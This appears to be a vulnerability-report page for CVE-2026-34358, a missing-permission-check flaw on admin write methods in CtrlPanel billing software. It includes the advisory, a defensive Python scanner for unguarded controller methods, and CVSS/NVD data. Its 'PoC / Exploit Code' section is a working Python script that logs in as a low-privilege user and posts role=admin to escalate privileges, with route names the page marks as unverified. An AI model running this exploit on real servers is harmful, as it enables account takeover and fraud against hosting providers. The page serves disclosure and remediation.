Security Vulnerability Report
CVE-2026-34358 CVSS 8.1 HIGH

CVE-2026-34358

Published: 2026-05-19 22:16:38
Last Modified: 2026-05-20 16:16:25

Description

CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a broken access control vulnerability: multiple admin controllers enforce permission checks on their form-display methods but omit the equivalent checks on the corresponding write methods, so any authenticated user can bypass RBAC by sending the POST/PATCH request directly, without ever loading the guarded form. Controllers missing checks on both write methods, store() and update(), include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write). ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request.

An authenticated attacker without admin write privileges can therefore issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts, including roles, credits, passwords, and linked Pterodactyl IDs, to achieve full privilege escalation. The attacker can also call logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0.
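The description above pins down a single pattern: the permission check lives in the form-display method (create()/edit()) while the matching write method (store()/update()) has none, so a direct POST or PATCH never hits it. The following Python script is an editorial example added here, not code from the CtrlPanel project or from this advisory. It scans Laravel controller source for exactly that asymmetry and also flags write methods with no check at all, which covers the stub store()/update() case. The two PHP controllers embedded in it are constructed for the example and modelled on the controllers the description names; the checkPermission() helper name and the method layout are assumptions, not CtrlPanel's actual code.

```python
import re

# Display method -> write method that must enforce the same permission.
# Mirrors the create()/store() and edit()/update() pairs named in the advisory.
DISPLAY_TO_WRITE = {"create": "store", "edit": "update"}

# Matches a PHP public method header and captures its name; the return type is optional.
METHOD_RE = re.compile(
    r"public\s+function\s+(\w+)\s*\([^)]*\)\s*(?::\s*[\w\\|?]+)?\s*\{"
)
# Matches the (assumed, hypothetical) permission helper: $this->checkPermission('admin.x.write')
PERMISSION_RE = re.compile(r"checkPermission\(\s*['\"]([\w.]+)['\"]\s*\)")


def method_permissions(src: str) -> dict:
    """Map each public method to the permission it checks, or None if it checks nothing."""
    headers = list(METHOD_RE.finditer(src))
    result = {}
    for i, m in enumerate(headers):
        # A method's span runs until the next method header (or end of file). Nested
        # braces do not matter because we only search the span for a permission call.
        end = headers[i + 1].start() if i + 1 < len(headers) else len(src)
        found = PERMISSION_RE.search(src, m.end(), end)
        result[m.group(1)] = found.group(1) if found else None
    return result


def find_asymmetries(src: str) -> list:
    """Return (display_method, write_method, permission) triples where the display
    method enforces a permission but its write counterpart enforces none."""
    perms = method_permissions(src)
    findings = []
    for display, write in DISPLAY_TO_WRITE.items():
        if display in perms and write in perms:
            if perms[display] is not None and perms[write] is None:
                findings.append((display, write, perms[display]))
    return findings


def unguarded_writes(src: str) -> list:
    """Write methods with no permission check at all, whether or not a display
    counterpart exists (this also catches empty stub store()/update() methods)."""
    perms = method_permissions(src)
    return sorted(name for name in DISPLAY_TO_WRITE.values()
                  if name in perms and perms[name] is None)


# Constructed sample (not CtrlPanel code): the vulnerable shape the advisory describes.
VULNERABLE_CONTROLLER = """<?php
class CouponController extends Controller
{
    public function create()
    {
        $this->checkPermission('admin.coupons.write');
        return view('admin.coupons.create');
    }

    public function store(Request $request)
    {
        Coupon::create($request->all());      // no permission check
        return redirect()->route('admin.coupons.index');
    }

    public function edit(Coupon $coupon)
    {
        $this->checkPermission('admin.coupons.write');
        return view('admin.coupons.edit', compact('coupon'));
    }

    public function update(Request $request, Coupon $coupon)
    {
        $coupon->update($request->all());     // no permission check
        return redirect()->route('admin.coupons.index');
    }
}
"""

# Constructed sample: the same controller with the check repeated on every write method.
FIXED_CONTROLLER = VULNERABLE_CONTROLLER.replace(
    "Coupon::create(", "$this->checkPermission('admin.coupons.write');\n        Coupon::create("
).replace(
    "$coupon->update(", "$this->checkPermission('admin.coupons.write');\n        $coupon->update("
)

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_CONTROLLER), ("fixed", FIXED_CONTROLLER)):
        print(f"[{label}] asymmetries: {find_asymmetries(src)}")
        print(f"[{label}] unguarded writes: {unguarded_writes(src)}")
```

Run it as a script and the vulnerable sample reports both create/store and edit/update as asymmetric, while the fixed sample reports nothing. Repeating the check inside every write method is the minimal fix; the more robust option in a Laravel app is to put the authorization on the route group (middleware applied to the whole admin resource) so that the GET form and its POST/PATCH write can never diverge again.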

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)


CtrlPanel <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import re

import requests

# Target configuration
target_url = "https://example.com"
login_endpoint = f"{target_url}/login"
# Targeting user ID 1. The route path and the "role" field are as given on this page and
# are not verified here against CtrlPanel's actual routing or form field names.
exploit_endpoint = f"{target_url}/admin/users/1/change_role"

# Attacker credentials (low privilege, no admin write permissions)
payload_login = {
    "email": "[email protected]",
    "password": "attacker_password",
}

# Payload to escalate privileges
payload_exploit = {
    "role": "admin",
}

session = requests.Session()


def csrf_token(html):
    # CtrlPanel is a Laravel application: its web routes reject a POST/PATCH that lacks the
    # session's CSRF token (HTTP 419), so the token is read from the hidden _token input
    # that Blade's @csrf directive renders into every form.
    match = re.search(r'name="_token"\s+value="([^"]+)"', html)
    return match.group(1) if match else None


# 1. Authenticate as a regular user
print("[*] Attempting to login...")
token = csrf_token(session.get(login_endpoint).text)
response = session.post(login_endpoint, data={**payload_login, "_token": token})
# Laravel answers both a successful and a failed login with a redirect, so check that we
# were not bounced back to the login form instead of relying on the status code alone.
if response.ok and not response.url.startswith(login_endpoint):
    print("[+] Login successful.")
    # Laravel rotates the CSRF token on login; re-read it from the landing page and fall
    # back to the pre-login token if that page carries no form.
    token = csrf_token(response.text) or token

    # 2. Exploit Broken Access Control on the write method.
    # The permission check exists only on the form-display method, so a direct request to
    # the write endpoint is never authorized.
    print("[*] Sending privilege escalation request...")
    exploit_response = session.post(exploit_endpoint, data={**payload_exploit, "_token": token})
    if exploit_response.ok:
        print("[+] Exploit successful! User ID 1 is now an admin.")
    else:
        print(f"[-] Exploit failed. Status: {exploit_response.status_code}")
else:
    print("[-] Login failed.")

References

https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-pxmw-gj52-9p68
https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34358",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T22:16:37.637",
    "lastModified": "2026-05-20T16:16:25.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contains a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH requests. Controllers missing checks on write methods store() and update() include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write); ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request. An authenticated attacker without admin write privileges can issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts including roles, credits, passwords, and linked Pterodactyl IDs to achieve full privilege escalation, as well as abuse logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0", "source": "[email protected]"},
      {"url": "https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-pxmw-gj52-9p68", "source": "[email protected]"},
      {"url": "https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-pxmw-gj52-9p68", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}